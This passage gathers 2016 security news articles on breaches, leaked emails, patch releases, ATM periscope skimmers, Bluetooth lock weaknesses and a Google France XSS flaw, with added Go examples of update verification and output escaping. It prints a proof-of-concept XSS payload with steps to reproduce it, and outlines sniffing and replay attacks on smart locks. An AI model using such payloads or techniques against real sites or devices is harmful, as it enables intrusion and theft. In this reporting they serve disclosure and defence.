"This sounds like a vulnerability to me anyhow, since they have your IMEI and Device Model, they can install any APK for your device specifically," Broenink said.
Even on the Xiaomi discussion forum, multiple users have expressed concerns about the existence of this mysterious APK and its purpose.
"Don't know what purpose it serves. Even after deleting the file it reappears after some time," one user said.
Another said, "if I go to the battery usage app, this app is always at the top. It is eating away at resources I believe."
How to Block Secret Installation?
As a temporary workaround, Xiaomi users can block all connections to Xiaomi-related domains using a firewall app.
No one from the Xiaomi team has yet commented on its forum about the question raised by Broenink. We'll update the story as soon as we hear from the company.
Meanwhile, if you are a Xiaomi user and have experienced anything fishy on your device, hit the comments below and let us know.
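The checks that the investigation found missing (no validation of which APK is installed, and an update channel over plain HTTP) can be shown in a small Go program. This is an added example, not code from the original article or from Xiaomi: the manifest format, the ed25519 signing key, the package name and the update URL are all assumptions made for the demonstration. A vendor public key pinned on the device verifies a signed manifest, the download is refused unless it comes over HTTPS, the package name must match the component being updated, and the downloaded bytes must match the signed digest.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// UpdateManifest is a hypothetical description of an update that a server
// publishes alongside the package. The fields and their layout are assumptions
// for this example, not Xiaomi's protocol.
type UpdateManifest struct {
	URL       string // where the package is downloaded from
	Package   string // package the update claims to be for
	SHA256    string // hex digest of the package bytes
	Signature []byte // ed25519 signature over the three fields above
}

// signedBytes is the canonical byte string that the vendor signs.
func signedBytes(m UpdateManifest) []byte {
	return []byte(m.Package + "\n" + strings.ToLower(m.SHA256) + "\n" + m.URL)
}

// SignManifest is the server side: it fills in the digest and the signature.
// It is here only so the example runs stand-alone; the private key never
// lives on the device.
func SignManifest(priv ed25519.PrivateKey, m UpdateManifest, pkg []byte) UpdateManifest {
	sum := sha256.Sum256(pkg)
	m.SHA256 = hex.EncodeToString(sum[:])
	m.Signature = ed25519.Sign(priv, signedBytes(m))
	return m
}

// VerifyUpdate is the client side: every check the write-up found missing.
// It returns nil only if the package may be installed.
func VerifyUpdate(pub ed25519.PublicKey, m UpdateManifest, pkg []byte, wantPackage string) error {
	// 1. Transport: refuse anything that is not HTTPS, so a man-in-the-middle
	//    on the network cannot substitute the manifest or the package.
	u, err := url.Parse(m.URL)
	if err != nil || u.Scheme != "https" {
		return errors.New("update URL must use https")
	}
	// 2. Authenticity: the manifest must be signed by the pinned vendor key.
	if !ed25519.Verify(pub, signedBytes(m), m.Signature) {
		return errors.New("manifest signature does not verify")
	}
	// 3. Identity: the update must be for the component we expect, not for
	//    "whatever file is named Analytics.apk".
	if m.Package != wantPackage {
		return fmt.Errorf("manifest is for %q, expected %q", m.Package, wantPackage)
	}
	// 4. Integrity: the bytes actually downloaded must match the signed digest.
	sum := sha256.Sum256(pkg)
	if hex.EncodeToString(sum[:]) != strings.ToLower(m.SHA256) {
		return errors.New("package digest does not match manifest")
	}
	return nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(nil) // nil means crypto/rand
	if err != nil {
		panic(err)
	}
	pkg := []byte("constructed stand-in for the APK bytes")
	m := SignManifest(priv, UpdateManifest{
		URL:     "https://update.example.invalid/analytics.apk", // hypothetical host
		Package: "com.example.analytics",                       // hypothetical package
	}, pkg)
	fmt.Println("genuine: ", VerifyUpdate(pub, m, pkg, "com.example.analytics"))

	// A tampered download fails the digest check even though the manifest is genuine.
	fmt.Println("tampered:", VerifyUpdate(pub, m, []byte("something else"), "com.example.analytics"))

	// Downgrading the channel to plain HTTP is refused before anything is installed.
	mHTTP := m
	mHTTP.URL = "http://update.example.invalid/analytics.apk"
	fmt.Println("http:    ", VerifyUpdate(pub, mHTTP, pkg, "com.example.analytics"))
}
```

Android itself already requires that an update to an installed package be signed by the same certificate as the package it replaces, which covers the identity check for ordinary installs; the transport and manifest checks above are what a privileged installer that bypasses the normal install path still has to do itself.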

FBI Director — You Should Cover Your Webcam With Tape
15.9.2016 thehackernews Security

Should you put a tape or a sticker over the lens of your laptop's webcam?
Yes, even Facebook CEO Mark Zuckerberg and FBI Director James Comey do that.
Covering your laptop's webcam is a dirt-cheap and sensible way to guard against hackers and intruders who might want to watch your private life and surroundings through your devices.
In fact, Comey recently came out defending his own use of tape to cover his personal laptop's webcam.
People Are Responsible for Their Safety, Security & Privacy
During a conference at the Center for Strategic and International Studies, when Comey was asked whether he still puts tape over his cameras at home, he replied:
"Heck yeah, heck yeah. And also, I get mocked for a lot of things, and I am much mocked for that, but I hope people lock their cars… lock your doors at night. I have an alarm system. If you have an alarm system you should use it, I use mine."
Comey went on to explain that it was common practice at the FBI and other government offices to cover computers and laptops' webcams with tape or any physical cover.
"It’s not crazy that the FBI Director cares about personal security as well," he continued. "If you go into any government office, we all have our little camera things that sit on top of the screen, they all have a little lid that closes down on them, you do that, so people who do not have authority don’t look at you, I think that’s a good thing."
Comey believes that putting a cover over webcams is one of the "sensible things" that everyone should be doing to "take responsibility for their own safety and security."
While this practice is often made fun of, taping over your devices' webcams is a good habit to adopt. We know about the FBI's and NSA's ability to spread malware and turn on a device's webcam to spy on targets.
The Edward Snowden leaks revealed the NSA's Optic Nerve operation, which captured webcam images every 5 minutes from random Yahoo users; in just six months in 2008, images of 1.8 million users were captured and stored on government servers.
Internet of Things: Security Nightmare
However, putting tape over the lens of your computer's webcam would not solve the problem, especially in this era when we are surrounded by so many Internet-connected devices that are a security nightmare.
Due to insecure implementations, these Internet-connected, or Internet of Things (IoT), devices, including security cameras, are so vulnerable that hackers are routinely hijacking them and using them as weapons in cyber attacks.
So it is far easier for hackers to hack your security cameras, instead of your laptop's webcam, to keep track of you and your environment.
Do you feel the need to use a tape over your webcam? Let us know down in the comments.

ClixSense Data Breach, 6.6 Million users’ records stolen
15.9.2016 securityaffairs Crime

Hackers have breached the database of the advertising company ClixSense and stolen the details of 6.6 million users.
Here we are again to discuss a new data breach that exposed millions of user records of the advertising service ClixSense. ClixSense allows its clients to earn money online by taking paid surveys, free offers and pay-per-click advertising.

The popular security expert Troy Hunt who operates the breach notification service HaveIBeenPwned reported the ClixSense data breach that compromised at least 6.6 million user records, 2.4 million of which are already public.

The stolen data includes names, usernames, email addresses, passwords stored in plain text, account balances, dates of birth, payment information and IP addresses.

“In September 2016, the paid-to-click site ClixSense suffered a data breach which exposed 2.4 million subscriber identities. The breached data was then posted online by the attackers who claimed it was a subset of a larger data breach totalling 6.6 million records. The leaked data was extensive and included names, physical, email and IP addresses, genders and birth dates, account balances and passwords stored as plain text.

Compromised data: Account balances, Dates of birth, Email addresses, Genders, IP addresses, Names, Passwords, Payment histories, Payment methods, Physical addresses, Usernames, Website activity” wrote Hunt.


The company has confirmed the incident and reported a successful cyber attack that allowed hackers to gain access to its database server. It seems that attackers reached the database server with a lateral movement from an old server that had still been connected to it.

“It has come to our attention that this hacker did get access to our database server for a short period of time. He was able to gain access to this not directly but instead through an old server we were no longer using that had a connection to our database server. (This server has since been terminated).” reads the official statement issued by the company.

“He was able to copy most if not all of our users table, he ran some SQL code that changed the names on accounts to “hacked account” and deleted many forum posts. He also set user balances to $0.00.”

The hackers were able to alter data in the database, including account names and user balances, which were set to zero; the company says it has restored the balances.

“We were able to restore the user balances, forum and many account names. Some of you were asked to fill out your name again as we did not want to restore this from our backup due to the amount of time it would have taken to get back online,” reads the statement.

In response to the incident, ClixSense has shut down the breached server, it has partially restored the backup, passwords have been reset and users have been advised to change their passwords.

The hackers published a post on Pastebin to announce the data breach, claiming they had access to 6,606,008 user records in the database and to the complete source code of the ClixSense website. According to the hackers, they released a data sample online after ClixSense initially denied being breached.

Let me close with a list of the most recent data breaches, which flooded the criminal underground with hundreds of millions of credentials:

Myspace (360 million)
LinkedIn (167 million)
Rambler (100 million)
VK (100 million)
Tumblr (65 million)
VerticalScope (45 million)
Last.fm (43 million)
QIP (33 million affected)

Colin Powell’s emails leaked online. He calls Trump ‘National Disgrace’
15.9.2016 securityaffairs Hacking

A new batch of Colin Powell’s emails was leaked online by Russian hackers. Powell criticized both presidential candidates, Trump and Clinton.
Powell’s emails, sent over a couple of years, have been published on the website DC Leaks in a password-protected section that was available only to select news outlets. These e-mails belong to a new batch not included in the Powell dump leaked a few years ago.

The emails contain Powell’s correspondence with his close collaborators, his team at a speakers bureau and journalists over a period of 26 months.

The emails, which span from June 2014 to last month, include Powell’s harsh comments on the presidential candidates, Donald Trump and Hillary Clinton.

The data leak was attributed to a group of Russian state-sponsored hackers known as APT28 or Fancy Bear, the same group that recently leaked US athletes’ medical records stolen from the World Anti-Doping Agency.

According to an investigation conducted by researchers at security firm ThreatConnect, the hackers are linked to the Kremlin.


Powell told The New York Times that the leaked messages are authentic.

“An aide to Mr. Powell confirmed the hack and said, ‘They are his emails.’”

Powell was highly critical of many politicians; in one of the hacked emails, he calls Trump a ‘National Disgrace and an international pariah.’

A message dated June 23, 2016, sent by Colin Powell to former Secretary of State Condoleezza Rice, reads:

“if Donald were to somehow win, by the end of the first week in office he’d be saying ‘What the hell did I get myself into?'”

Colin Powell also criticized Hillary Clinton’s campaign and the way she handled the theft of her emails.

“I would rather not have to vote for her, although she is a friend I respect,” Powell wrote. “A 70-year person with a long track record, unbridled ambition, greedy, not transformational, with a husband still d—ing bimbos at home (according to the NYP).”

The Clinton campaign’s “email ploy this week didn’t work and she once again looks shifty if not a liar,” Powell wrote on August 20 to someone he worked with at the White House. “Trump folks having fun with her.”

In a separate leaked email exchange reported by NBC News, Powell also criticized aides to Hillary Clinton for their attempts to involve him in the case of the theft of her email due to the use of a private email server when she served as Secretary of State.

In other emails reported by BuzzFeed News, Colin Powell accuses Trump of having embraced a “racist” movement when he publicly questioned the validity of President Obama’s birth certificate.

“Yup, the whole birther movement was racist,” Mr. Powell wrote in an email to a former aide, according to BuzzFeed. “That’s what the 99% believe. When Trump couldn’t keep that up he said he also wanted to see if the certificate noted that he was a Muslim. As I have said before, ‘What if he was?’ Muslims are born as Americans everyday.” Reported the NYT.

It’s still not clear how the hackers compromised Powell’s Gmail account in order to steal the messages.

Some experts argued that Powell’s Gmail account was hacked because he reused the same login credentials on a web service that was compromised in the past. Colin Powell’s Gmail credentials were also used to access Dropbox, and these data are contained in the Dropbox dump recently leaked online.

Colin Powell’s emails have been leaked a few months after the mysterious hacker Guccifer 2.0 hacked the Democratic National Committee. Powell’s e-mails were published on a password-protected portion of DC Leaks that was available only to select news outlets. So far, there have been no definitive reports on precisely how the messages were obtained by DC Leaks.

How to hack Google FR by exploiting a cross-site scripting flaw
15.9.2016 securityaffairs Android

The security expert Issam Rabhi (@issam_rabhi) has discovered a cross-site scripting vulnerability in Google France. The giant has already fixed it.
A security expert from the French security outfit Sysdream, Issam Rabhi (@issam_rabhi), discovered a cross-site scripting vulnerability in Google France. Yes, you’ve got it right: the website of the IT giant was affected by one of the most common vulnerabilities. According to the OWASP Top Ten, cross-site scripting is the third most common issue affecting web applications.


This kind of flaw could be exploited by a malicious attacker for various attacks, including defacements and traffic hijacking.

“XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.” reads the description provided by the OWASP TOP 10.

Rabhi reported the cross-site scripting vulnerability to Google on August 5th, and the company’s engineers fixed it in just four days.

Rabhi published a proof-of-concept for the attack on his website; the exploitation steps are below:

First, open the link below using the Firefox browser:
Then, insert the following payload in the search input field:
<svg onload=alert(document.domain)>
Finally, the alert message box will pop up on the screen.

The expert did not submit the bug under the Google bug bounty program, but he received kudos from his colleagues.
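The reflected flaw described above, and the fix that removes it, as an added example written for this page rather than code from Rabhi's write-up or from Google: a Go search handler reflects the query into the results page, first by string formatting (the pattern that lets the `<svg onload=…>` probe become markup) and then through html/template, which escapes the value for the HTML text context it lands in. The results template, the function names and the expected output are assumptions for the example; the payload itself is the one from the write-up.

```go
package main

import (
	"fmt"
	"html/template"
	"strings"
)

// SamplePayload is the probe from the write-up, used here as constructed input.
const SamplePayload = `<svg onload=alert(document.domain)>`

// RenderUnsafe reflects the search term by plain string formatting. A browser
// parses the injected <svg> element and runs its onload handler.
func RenderUnsafe(query string) string {
	return fmt.Sprintf("<p>Results for: %s</p>", query)
}

// resultsTmpl is an html/template: values are escaped according to the
// context they are inserted into, here HTML text.
var resultsTmpl = template.Must(template.New("results").Parse("<p>Results for: {{.}}</p>"))

// RenderSafe reflects the same search term through the escaping template.
// For SamplePayload it yields:
//   <p>Results for: &lt;svg onload=alert(document.domain)&gt;</p>
func RenderSafe(query string) (string, error) {
	var sb strings.Builder
	if err := resultsTmpl.Execute(&sb, query); err != nil {
		return "", err
	}
	return sb.String(), nil
}

// ContainsElement reports whether the rendered markup still contains an
// opening tag for the named element, which is the assertion a regression
// test for this class of bug would make.
func ContainsElement(markup, element string) bool {
	return strings.Contains(strings.ToLower(markup), "<"+strings.ToLower(element))
}

func main() {
	fmt.Println("unsafe:", RenderUnsafe(SamplePayload))
	safe, err := RenderSafe(SamplePayload)
	if err != nil {
		panic(err)
	}
	fmt.Println("safe:  ", safe)
	fmt.Println("raw <svg survives in safe output?", ContainsElement(safe, "svg"))
}
```

Contextual escaping is the point: html/template also escapes differently inside attributes, URLs and script blocks, so the same `{{.}}` placed in an `href` or an `onclick` would get the encoding appropriate to that context, whereas a hand-written replacement of `<` and `>` covers only the text case shown here.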

The Project Zero Contest — Google will Pay you $200,000 to Hack Android OS
14.9.2016 securityaffairs Hacking
Why wait for researchers and bug hunters to find vulnerabilities in your products when you can just run a contest for that?
Google has launched its own Android hacking contest with the first prize winner receiving $200,000 in cash.
That's a Hefty Sum!
The contest is a way to find and destroy dangerous Android vulnerabilities before hackers exploit them in the wild.
The competition, dubbed 'The Project Zero Prize,' is being run by Google’s Project Zero, a team of security researchers dedicated to documenting critical bugs and making the web a safer place for everyone.
What Are the Requirements?
Starting Tuesday and ending on March 14, 2017, the contest will only award cash prizes to contestants who can successfully hack any version of Android Nougat on Nexus 5X and 6P devices.
However, the catch here is that Google wants you to hack the devices knowing only the devices' phone numbers and email addresses.
To get their exploits working, contestants are allowed to trick a user into opening an email in Gmail or an SMS text message in Messenger, but no other user interaction beyond this is allowed.
So, if you want to participate in 'The Project Zero Prize' contest, you are advised to focus on flaws or bug chains that would allow you to perform Remote Code Execution (RCE) on multiple Android devices.
"Despite the existence of vulnerability rewards programs at Google and other companies, many unique, high-quality security bugs have been discovered as a result of hacking contests," Project Zero security researcher Natalie Silvanovich said in a blog post while announcing the competition.
Therefore, the company has taken this initiative to run its own hacking contest in search of severe Android security vulnerabilities.
Contest Cash Prizes
First Prize: worth $200,000 USD will be awarded to the first winning entry.
Second Prize: worth $100,000 USD will be awarded to the second winning entry.
Third Prize: At least $50,000 USD will be awarded to additional winning entries.
Besides cash prizes, winners will also be invited to write a short technical report describing their entry, which will then be posted on the Project Zero Blog.
For more details about the contest, you can check out the Project Zero Security Contest Official Rules.

Microsoft and Adobe Roll Out Critical Security Updates - Patch Now!
14.9.2016 securityaffairs Vulnerebility

You should not miss this month’s Patch Updates, as it brings fixes for critical issues in Adobe Flash Player, iOS, Xcode, the Apple Watch, Windows, Internet Explorer, and the Edge browser.
Adobe has rolled out a critical update to address several issues, most of which are Remote Code Execution flaws, in its widely-used Adobe Flash Player for Windows, Macintosh, Linux and ChromeOS. Meanwhile, Microsoft has released 14 security updates to fix a total of 50 vulnerabilities in Windows and related software.
First of all, if you have Adobe Flash Player installed and have not yet updated your software plugin, you are playing with fire.
Critical Flash Vulnerabilities Affect Windows, Mac, Linux and ChromeOS
Adobe has released its latest round of security patches to address critical vulnerabilities in Adobe Flash Player for Windows, Mac OS X, Linux and ChromeOS.
The Flash vulnerabilities could potentially allow an attacker to take control of the vulnerable system. So, users are strongly advised to update to Flash Player version before hackers have their hands on it.
However, the best advice I can give you is to ditch this insecure, buggy software once and for all and significantly improve the security of your system in the process.
Even PornHub said Good Bye to Flash Player, so it's no longer an excuse for you to keep Flash on your PC ;)
Meanwhile, Microsoft has released its September 2016 Patch Update that includes 14 bulletins, seven of which earned its most severe "critical" rating and seven of which are rated as "important," addressing a total of 50 vulnerabilities.
Critical Zero-Day Exploit in the Wild
The most critical vulnerability addressed by Microsoft in the MS16-104 and MS16-105 update is a zero-day vulnerability in Internet Explorer (IE) and Edge.
Dubbed Microsoft Browser Information Disclosure Vulnerability (CVE-2016-3351), the zero-day flaw could allow an attacker to perform remote code execution attacks by tricking a victim to view a specially crafted webpage using Internet Explorer or Edge.
If exploited successfully, the attacker would gain the same user rights as the current user and could take control of an affected system, if the victim is logged on with administrative user rights, potentially allowing the attacker to install malware, modify or delete data, or even create new accounts with full user rights.
This informational disclosure bug was first reported by Proofpoint researchers with the help of Trend Micro in 2015, when they uncovered a massive malvertising campaign, dubbed AdGholas, actively exploiting the CVE-2016-3351 flaw.
The researchers also found another hacking group named GooNky actively exploiting the flaw. For in-depth details about the flaw, you can head on to Proofpoint's blog post.
Another critical bulletin, MS16-108, affecting organizations using Exchange Server for their email platform addresses a file-format parsing flaw that could be exploited by attackers for remote code execution to get full control of the Exchange Server. This flaw affects all supported versions of Exchange Server.
To exploit the flaw, all an attacker needs to do is send a malicious file to anyone in the organization: Exchange Server pre-parses the file to determine its type, which triggers the malicious exploit before users even receive the file.
Other Critical and Important flaws in Windows and its Software
Other critical Bulletins include MS16-106 that fixes five holes in the Windows Graphics Device Interface; MS16-107 that contains patches for Microsoft Office and SharePoint to address a total of 13 vulnerabilities; MS16-116 that fixes a RCE flaw in Microsoft OLE Automation mechanism and the VBScript Scripting Engine; and MS16-117 that includes critical fixes for Adobe Flash libraries contained in Internet Explorer 10 and 11 and Microsoft Edge.
Note: The MS16-11 fix requires users to first apply the Internet Explorer update (MS16-104) in order to be effective.
Important Bulletins include fixes for RCE flaws in Windows, SMBv1 Server and Silverlight; elevation of privilege flaws in the Windows Kernel and Windows Lock Screen; an information disclosure bug in the Windows Secure Kernel Mode; and a pair of information disclosure vulnerabilities in Windows PDF Library.
Users are advised to apply the Windows as well as the Adobe patches to keep hackers and cybercriminals from taking control of their computers.
Microsoft Ends Tuesday Patches Trend
The September Patch Update was the last traditional Windows Patch Tuesday as the tech giant is moving to a new patching release model.
The future patch updates will bundle all patches together, and you will no longer be able to select which updates to install. The whole package of patches will be installed altogether, which will leave no chance for hackers to target vulnerabilities for which patches are already released.
In addition, the new "Monthly Rollup" will be cumulative: the November patch update, for example, will also include all the patches from October.

Apply the security updates issued by Adobe and Microsoft asap
14.9.2016 securityaffairs Vulnerebility

Are you still using Adobe Flash Player? Are you browsing the web with IE or Edge? Does your company use an Exchange Server? Apply security updates asap!
It’s time to patch your systems, especially if you have Adobe Flash Player installed. Adobe has released security updates to fix critical Flash vulnerabilities that affect every OS (Windows, Mac, Linux), including ChromeOS.

The security vulnerabilities in Flash could be exploited by attackers to gain control over the vulnerable system, as explained by Adobe in an executive summary:

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and ChromeOS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. ” reads the security advisory issued by Adobe.

Users are urged to update their Flash Player to the version


Adobe users are not the only ones under fire: Microsoft has released the September 2016 Patch Update, which includes 14 bulletins addressing a total of 50 vulnerabilities. Seven vulnerabilities addressed in the latest patch update have been rated as “critical,” another seven as “important.”

One of the vulnerabilities fixed by the update is a zero-day flaw (CVE-2016-3351) in Internet Explorer (IE) and Edge, addressed in MS16-104 and MS16-105.

CVE-2016-3351, the so-called Microsoft Browser Information Disclosure Vulnerability, could be exploited by an attacker to remotely execute code by tricking a victim into visiting a specially crafted webpage using Internet Explorer or Edge.

Once the victims visit the webpage, the attacker would gain the same user rights as the current user and could take control of the vulnerable system.

The vulnerability was first spotted by security experts at Proofpoint, who worked with researchers from Trend Micro.

“Proofpoint researchers recently uncovered a massive malvertising campaign with colleagues at Trend Micro [2]. The actors, dubbed AdGholas, were notable for their use of steganography and careful targeting of the malicious ads for massive volumes of high-quality impressions – impressions that went to 1-5 million “average users” a day and specifically avoided researchers. Avoiding researchers and their virtual machines and sandboxes relied on exploiting an information disclosure zero-day in Microsoft Internet Explorer/Edge, among other techniques.” reads the analysis published by Proofpoint.

The exploitation of the zero-day was first reported by Trend Micro, which uncovered a massive malvertising campaign, dubbed AdGholas, actively exploiting it. The same vulnerability was also exploited in the wild by another threat actor, a hacking crew known as GooNky.

“On September 13, 2016 Microsoft released a security bulletin [1] fixing the CVE-2016-3351 vulnerability, which included a patch for Internet Explorer and Edge browsers. This informational disclosure bug was first reported in 2015. During our work with Trend Micro on the AdGholas [2] campaign, we reported it again and it was assigned a CVE ID and patch. Briefly, this vulnerability is a MIME type check used to filter out systems that have certain shell extension associations, including .py, .pcap, and .saz. In some cases, certain extensions association including .doc, .mkv., .torrent, and .skype are required to trigger the next exploitation step.”

The Microsoft update also addresses another critical flaw in all the supported versions of the Exchange Server (MS16-108) widely adopted by organizations. In this case, attackers could exploit the bug using remote-code execution to get full control of the Exchange Server.

The attack scenario is simple: the attackers just need to send a malicious file to their victims, and the vulnerability is automatically triggered when the Exchange Server pre-parses the file to determine its type.

As mentioned, the Microsoft update addresses many other flaws; take a look at it.

Let me close with a note regarding the traditional Microsoft monthly update: this is the last Windows Patch Tuesday.

The future patch updates will bundle all patches together, this means that users will have to install the whole package of patches altogether.

Don’t waste time, patch your system asap.

Periscope Skimming, a new ATM threat spotted in the US
14.9.2016 securityaffairs Hacking

The Secret Service warns of periscope skimming probes; it is the first time that law enforcement has discovered attacks against ATMs conducted with these devices.
The US Secret Service is warning banks and ATM vendors about a new ATM skimmer technology, the so-called ‘periscope skimming.’ The device is composed of a skimming probe that crooks connect to the ATM’s internal circuit board in order to steal card data.

The popular cyber security expert Brian Krebs published the images of the periscope skimming, the photos show the wires protruding from the periscope.


As explained by Krebs, this is the first time that periscope skimming has been spotted by law enforcement in the US. The police have already discovered two installations of the periscope skimming in the country, the first one on August 19 in Greenwich, Connecticut, the second one on September 3 in Pennsylvania.
“According to a non-public alert released to bank industry sources by a financial crimes task force in Connecticut, this is thought to be the first time periscope skimming devices have been detected in the United States.” wrote Brian Krebs in a blog post.

The new periscope skimming device is able to store up to 32,000 payment card numbers and, once installed on the ATM, can run on its own power for up to 14 days.

In both installations analyzed by law enforcement, the cyber criminals gained access to the insides of the cash machines (referred to as “top-hat” entry) by using a key, then installed two devices connected to each other by wiring.

One of the devices is the periscope skimming probe that is installed through a pre-existing hole on the frame of the motorized card reader. The probe connects the pad to the circuit board.

The second device is the so-called “skimming control device,” it is directly connected to the skimming probe and is composed of the battery source and data storage unit.

“The probe is set in place to connect to the circuit board and directly onto the pad that transfers cardholder data stored on the magnetic stripe on the backs of customer payment cards. The probe is then held in place with fast-drying superglue to the card reader frame.” wrote Krebs.

“According to the Secret Service, the only visible part of this skimming device once the top-hat is opened will be the wire extending from the periscope probe that leads to the second part of this skimmer — called a “skimming control device.” “


Authorities believe the samples of periscope skimming probes recently discovered are just prototypes, in fact, they lack hidden cameras or other methods of capturing bank customer’s PINs at the ATMs.

Krebs maintains that the incidence of such skimming scams will not decrease as more banks begin adopting chip-based payment cards. Most banks and financial institutions will continue to rely on the magnetic stripe of the new generation of cards. It is likely that banks will continue to read the magnetic stripe at the ATM to check that the card has been inserted correctly into the slot of the cash machine.

“The principal reason for this is to ensure that customers are putting the card into the slot correctly, as embossed letters and numbers running across odd spots in the card reader can take their toll on the machines over time. As long as the cardholder’s data remains stored on a chip card’s magnetic stripe, thieves will continue building and placing these types of skimmers.” explained Krebs.

How can such attacks be avoided?

Users should avoid ATMs whose top-hat may be easy to access: prefer cash machines installed in the wall of a bank branch, and do not use ATMs located in unprotected places.

Sports doping agency WADA confirms attack by Russian cyber spies
14.9.2016 securityaffairs BigBrothers

World Anti-Doping Agency (WADA) confirms that Russian hackers breached its Anti-Doping Administration and Management System (ADAMS) database.
Hackers breached the World Anti-Doping Agency (WADA) and stole Olympic athletes’ medical records; the hack was confirmed by the agency. According to WADA, the hackers accessed the Anti-Doping Administration and Management System (ADAMS) database, and security experts suspect the involvement of the “Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear.”

The hackers obtained the access to the system by stealing credentials through a spear phishing attack against an “International Olympic Committee (IOC)-created account for the Rio 2016 Games.”

The attackers exploited the attention surrounding the Olympic Games to trick their victims with a classic social-engineering lure.

“The World Anti-Doping Agency (WADA) confirms that a Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear, illegally gained access to WADA’s Anti-Doping Administration and Management System (ADAMS) database via an International Olympic Committee (IOC)-created account for the Rio 2016 Games. The group accessed athlete data, including confidential medical data — such as Therapeutic Use Exemptions delivered by International Sports Federations (IFs) and National Anti-Doping Organizations (NADOs) — related to the Rio Games; and, subsequently released some of the data in the public domain, accompanied by the threat that they will release more.” reads the statement issued by the WADA that regrets the cyber attack.

Tweet by @wada_ama, 13 September 2016: "WADA Confirms Attack by Russian Cyber Espionage Group" http://ow.ly/gYik304aJxX
The hackers released files claiming that top US athletes had been authorized by WADA to take performance-enhancing substances; WADA, the sports federations and the athletes themselves have publicly denied any wrongdoing.
Fancy Bear published the announcement of the breach and the related files on a website bearing its name. (Be cautious before visiting the site: Fancy Bear is one of the most dangerous APT groups and has used zero-day exploits in several attacks.) Below is the message the group posted on the site, alongside the athletes' medical records.

“Greetings citizens of the world. Allow us to introduce ourselves… We are Fancy Bears’ international hack team. We stand for fair play and clean sport.

We announce the start of #OpOlympics. We are going to tell you how Olympic medals are won. We hacked World Anti-Doping Agency databases and we were shocked with what we saw.”

“We will start with the U.S. team which has disgraced its name by tainted victories. We will also disclose exclusive information about other national Olympic teams later. Wait for sensational proof of famous athletes taking doping substances any time soon.”

According to the leaked documents, Serena Williams, for example, was allowed to take oxycodone, hydromorphone, prednisone and methylprednisolone in 2010, 2014 and 2015, even though these substances are banned by WADA.

According to RT.com, Williams was also authorized by Dr. Stuart Miller of the International Tennis Federation (ITF) to take other drugs.


WADA director general Olivier Niggli confirmed the involvement of Russian hackers in the statement issued by the agency.

“WADA condemns these ongoing cyber-attacks that are being carried out in an attempt to undermine WADA and the global anti-doping system,” said Niggli. “WADA has been informed by law enforcement authorities that these attacks are originating out of Russia,” he continued. “Let it be known that these criminal acts are greatly compromising the effort by the global anti-doping community to re-establish trust in Russia further to the outcomes of the Agency’s independent McLaren Investigation Report,” Niggli continued.

According to experts, the hackers hit WADA in retaliation for its findings of state-sponsored doping in Russian athletics, which led to some Russian athletes being banned from this summer's Olympic Games.

Stay Tuned …

324,000 Financial Records leaked online, who is the victim?
14.9.2016 securityaffairs Crime

A hacker leaked a data dump containing more than 320,000 financial records apparently stolen from an Israeli payment processor.
Another data breach is in the headlines: roughly 324,000 financial records have been leaked online.

The financial data appears to have been stolen either from the payment processor BlueSnap or from its customer Regpack. A hacker published a link to the archive (a file named "Bluesnap_324K_Payments.txt") on the Twitter account @0x2Taylor.


The hacker who published the link claimed the data belongs to BlueSnap, an e-commerce solutions provider specializing in global payment processing: it lets its customers' websites accept payments from their clients by providing merchant facilities.

BlueSnap was founded in Israel in 2001 as Plimus and was rebranded BlueSnap after its acquisition in 2011.

Regpack provides online event-registration solutions and has used BlueSnap's payment platform since 2013.

The records include names, email addresses, IP addresses, physical addresses, phone numbers, invoices, the last four digits of credit card numbers, and even CVV codes.


Note that even though full card numbers were not disclosed, the leaked CVVs, combined with the names, addresses and last four digits, give fraudsters most of what they need for card-not-present transactions once a full card number is obtained elsewhere.

At the time I was writing, both BlueSnap and Regpack denied having been victims of a data breach.

The news was shared by the well-known security expert Troy Hunt, who analyzed the leaked records and verified that they are genuine.

Hunt also highlighted the presence of invoices related to a Jewish company, another detail pointing to the involvement of one of the two named companies.

“Now it’s possible that the data has come from another unnamed party, but it’s highly unlikely. Not only could I not pick a pattern in the data suggesting it was sourced from elsewhere, but the CVVs just shouldn’t have been there,” Hunt wrote in a blog post. “We’ve got 899 totally separate consumers of the Regpack service (so it’s not from one of them) who send their data direct to Regpack who pass payment data onto BlueSnap for processing. Unless I’m missing a fundamental piece of the workflow (and I’m certainly open to suggestions on what this might be), it looks like accountability almost certainly lies with one of these two parties.”

Hunt contacted both companies for comment; both denied any incident after forensic investigations.

To check whether your data is included in the dump, use Hunt's breach-notification service, https://haveibeenpwned.com/.

How to Hack Smart Bluetooth Locks and IoT Devices — Check this Out
13.9.2016 thehackernews Hacking
Bluetooth Low Energy, also known as Bluetooth Smart or Bluetooth 4, is the leading protocol for connecting IoT devices, medical equipment and smart-home products, and, as with most emerging technologies, security is often an afterthought.
As devices become more and more embedded in our daily lives, vulnerabilities have real impact on our digital and physical security.
Enter the Bluetooth lock, promising the convenience of a digital key with temporary, Internet-shareable access. The problem is that most of these locks have vulnerabilities that are easily exploited over Bluetooth.
DEF CON always has the coolest new hacks and security news, and this year was no exception. Hacking conferences are a great way to take the pulse of the security world: what people are interested in, worried about, or looking to exploit.
This year clearly had an uptick in Internet of Things (IoT) devices and ways to hack them.
Obviously, we had to go and take a look at the Bluetooth lock hack, and we were not the only ones.
A number of security and general tech sites covered how vulnerable some of these locks are: a shocking 75% of those tested could be hacked relatively easily, and one that was reported to have strong security could actually be opened with a screwdriver.
The locks were from companies like BlueLock, Kwikset, Noke, August, BitLock, and QuickLock.
How to Hack a Bluetooth Lock:
A number of researchers have tackled this problem, but Anthony Rose and Ben Ramsey of Merculite Security did a great job of thoroughly going through a significant number of locks, documenting the attacks and contacting the manufacturers.
Look for plaintext passwords: many of the locks used passwords but simply transmitted them in plaintext. Anyone with a decent Bluetooth sniffer such as Ubertooth and a little effort now owns your password.
Replay the signal: fine, you built in strong encryption and I cannot hope to read or decrypt the signal you just sent to the lock. But if I simply capture and replay what you sent, the door opens wide, because the lock has no way to tell a fresh command from an old one.
